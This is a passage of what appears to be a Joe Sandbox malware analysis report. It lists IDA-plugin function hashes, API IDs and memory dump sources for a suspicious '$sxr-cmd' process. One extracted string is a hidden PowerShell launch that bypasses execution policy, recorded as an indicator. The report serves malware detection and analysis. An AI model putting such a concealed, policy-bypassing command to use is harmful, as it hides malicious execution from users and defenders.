                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$EnvironmentVariable
                                                                                                            • String ID: DIRCMD
                                                                                                            • API String ID: 1405722092-1465291664
                                                                                                            • Opcode ID: b57441518c80c6c975e78a206d29843445d204bab782f52da51c6cf931825d4e
                                                                                                            • Instruction ID: 6633c139d9d0e7b4c3d4118fa803aaa425a819b88f71cf1c88f6e021d4a44433
                                                                                                            • Opcode Fuzzy Hash: b57441518c80c6c975e78a206d29843445d204bab782f52da51c6cf931825d4e
                                                                                                            • Instruction Fuzzy Hash: 98816072A18BC28AEB60EF60E8802ED77A5FB48758F504139DA4D77B58DF38D2598710
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$wcschr$Process$AllocateFree_setjmp_wcsuprmemsetwcscmp
                                                                                                            • String ID: FOR$ IF
                                                                                                            • API String ID: 557945885-2924197646
                                                                                                            • Opcode ID: 012d4e0aad7e1382614acb10a6537d507bdfce538949b726c19ff0d56bac9c31
                                                                                                            • Instruction ID: e47938f32e72be3a209bdc3edcc99f742a0bc22bc730961b248fd2ecd914ef1f
                                                                                                            • Opcode Fuzzy Hash: 012d4e0aad7e1382614acb10a6537d507bdfce538949b726c19ff0d56bac9c31
                                                                                                            • Instruction Fuzzy Hash: C9519C21B09E4285FE94BB259490279A691BF8DBB0BC84235D92E777D1DE3CA80DC370
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: iswdigit$iswspacewcschr
                                                                                                            • String ID: )$=,;
                                                                                                            • API String ID: 1959970872-2167043656
                                                                                                            • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                            • Instruction ID: 923196bc6ffc9c564d2f85415a012f2558191f06133763861d6b238fd77a2293
                                                                                                            • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                            • Instruction Fuzzy Hash: 2841CF66E08E5685FBE06F15A484379F6A0BF19771FC54231CA8D32AA0DF3CA49D8730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                                            • String ID: %04X-%04X$:
                                                                                                            • API String ID: 930873262-1938371929
                                                                                                            • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                            • Instruction ID: a4dad5fbf99fddd9a16597a33b49c86a8f5a303b10cdcc3942712a5ee1901fb5
                                                                                                            • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                            • Instruction Fuzzy Hash: 49417021A08E42C6FBA1AB60E4502BAE6A0FB88720FC04135D99D676D5DF7ED55DC730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                            • String ID: d
                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                            • Opcode ID: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                            • Instruction ID: 6fb92bfacac448434563605237513f3020ce1b1d14753658103401a21867c811
                                                                                                            • Opcode Fuzzy Hash: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                            • Instruction Fuzzy Hash: A8418333614B94EBEB608F51E5487DAB7A2F399799F408125EB8907B58DF38D158CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                            • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                            • API String ID: 3249344982-2616576482
                                                                                                            • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                            • Instruction ID: 260ced913d1dfc1ad1608cfb4cf4de978366554741c46f2c706c5185df52fdc6
                                                                                                            • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                            • Instruction Fuzzy Hash: 70416F72618F4186F3909F12A884769FAA4FB4DBE4F844238DA4E17B94CF7DD018CB20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcschr$iswdigit
                                                                                                            • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                            • API String ID: 2770779731-632268628
                                                                                                            • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                            • Instruction ID: 9bdf456648589e8ebf1ad5e51906ab4fced671ae921061500d75042b170560d1
                                                                                                            • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                            • Instruction Fuzzy Hash: B0315C22A08F56C5EB90AF11E490278B7E4FB49FA5B958135DA5E23354EF3DE81CC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 190073905-0
                                                                                                            • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction ID: f4dfcc18c15c868bdd044af8da8f32cc177cd271fbdd49f31caf34b4bcce3ba0
                                                                                                            • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction Fuzzy Hash: 10810531602E28FAFE509B36984DFD96293B7E7B8EFD44494BA0647796DB38C40D8700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3355953691.000002155A580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002155A580000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a580000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 190073905-0
                                                                                                            • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction ID: 5b1ae83516856f57822cff817a483ad25a540ed52fee580306a7bc6bc9609a31
                                                                                                            • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction Fuzzy Hash: 6C81D331600E63EAFF50AB259849BD922D3A7F578CFE444A4BA055BB96DB38C84DC700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192234081-0
                                                                                                            • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                            • Instruction ID: 06ea72d9652922268fea0a0da2dac42b51bafdbc17577cb94fc726b8acb65212
                                                                                                            • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                            • Instruction Fuzzy Hash: 8B319331708A418BE790AF25A44467DFB90FB89BA0F849234DE8A67795CE7DD41D8B20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7137F14D6,?,?,?,00007FF7137EAA22,?,?,?,00007FF7137E847E), ref: 00007FF7137F1673
                                                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7137F14D6,?,?,?,00007FF7137EAA22,?,?,?,00007FF7137E847E), ref: 00007FF7137F168D
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7137F14D6,?,?,?,00007FF7137EAA22,?,?,?,00007FF7137E847E), ref: 00007FF7137F1757
                                                                                                            • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7137F14D6,?,?,?,00007FF7137EAA22,?,?,?,00007FF7137E847E), ref: 00007FF7137F176E
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7137F14D6,?,?,?,00007FF7137EAA22,?,?,?,00007FF7137E847E), ref: 00007FF7137F1788
                                                                                                            • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7137F14D6,?,?,?,00007FF7137EAA22,?,?,?,00007FF7137E847E), ref: 00007FF7137F179C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$Alloc$Size
                                                                                                            • String ID:
                                                                                                            • API String ID: 3586862581-0
                                                                                                            • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                            • Instruction ID: c80c5c725d3ad950deabf466cf5294120e38fb49faa4ca6fd3d6b27a7422ba53
                                                                                                            • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                            • Instruction Fuzzy Hash: E9918122A09E4281EB90AF15E480278F7A4FB49BB4F958135DA6D237A4DF3DE45DC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 1313749407-0
                                                                                                            • Opcode ID: 68bb012136afad4bc4269743a11f9cffbd7fa22278cea90903a856b678ea36e9
                                                                                                            • Instruction ID: c617b5fa39b4f0701bb102af848a99ccec870b48395c96587fd76f3544e639cd
                                                                                                            • Opcode Fuzzy Hash: 68bb012136afad4bc4269743a11f9cffbd7fa22278cea90903a856b678ea36e9
                                                                                                            • Instruction Fuzzy Hash: 0A51A521A09E9296EB90BB119444279EA99BF4DBB0F884134DD2E277D5DF3DE44C8270
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                                            • String ID:
                                                                                                            • API String ID: 920682188-0
                                                                                                            • Opcode ID: bc14161cc29778c9355453191e93d5478ea0026767946b5047b0b5c87387b74a
                                                                                                            • Instruction ID: 36fb76958ea05dd227e299bc9ae3880a8341d908e3d9c06ad381e3d08bd00ddb
                                                                                                            • Opcode Fuzzy Hash: bc14161cc29778c9355453191e93d5478ea0026767946b5047b0b5c87387b74a
                                                                                                            • Instruction Fuzzy Hash: A0518C32705F818AEB61EF20D8902E8B7A4FB88B94F848035CA4D5B754EF3DD659C720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VO, xrefs: 00007FF7137EE00B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$FreeProcess_setjmp
                                                                                                            • String ID: C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VO
                                                                                                            • API String ID: 777023205-3145142378
                                                                                                            • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                            • Instruction ID: fd14ea86407f65c5095dc6599435bcc25996b32e74b28e69a313e21c64dcaf2c
                                                                                                            • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                            • Instruction Fuzzy Hash: 70515B7094DE42C9EB90AB15A880578F6A0BF48770FE44A35D94E72764DF3EA46CC630
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: iswdigit$iswspacewcschr
                                                                                                            • String ID: )$=,;
                                                                                                            • API String ID: 1959970872-2167043656
                                                                                                            • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                            • Instruction ID: 3d5a514690a5cd4ce6a3bbbd743c254b254abf24bdfd7b369cbca0701d709c15
                                                                                                            • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                            • Instruction Fuzzy Hash: 3C41CF65E08E1786FBE47B05A484279F6A0BF19771FC25231C98D329A0DF3CA46D8630
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsnicmpfprintfwcsrchr
                                                                                                            • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                            • API String ID: 3625580822-2781220306
                                                                                                            • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                            • Instruction ID: 4c5f797e4aaab1a902d134f7b0a9fcd0ec206b06169695e26bf4f1578ba7e554
                                                                                                            • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                            • Instruction Fuzzy Hash: EC31B721A08E4685FBD47B52A5401B9F2A4BB45BB4F844130DD2D3B7A5DE3EE46DC330
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
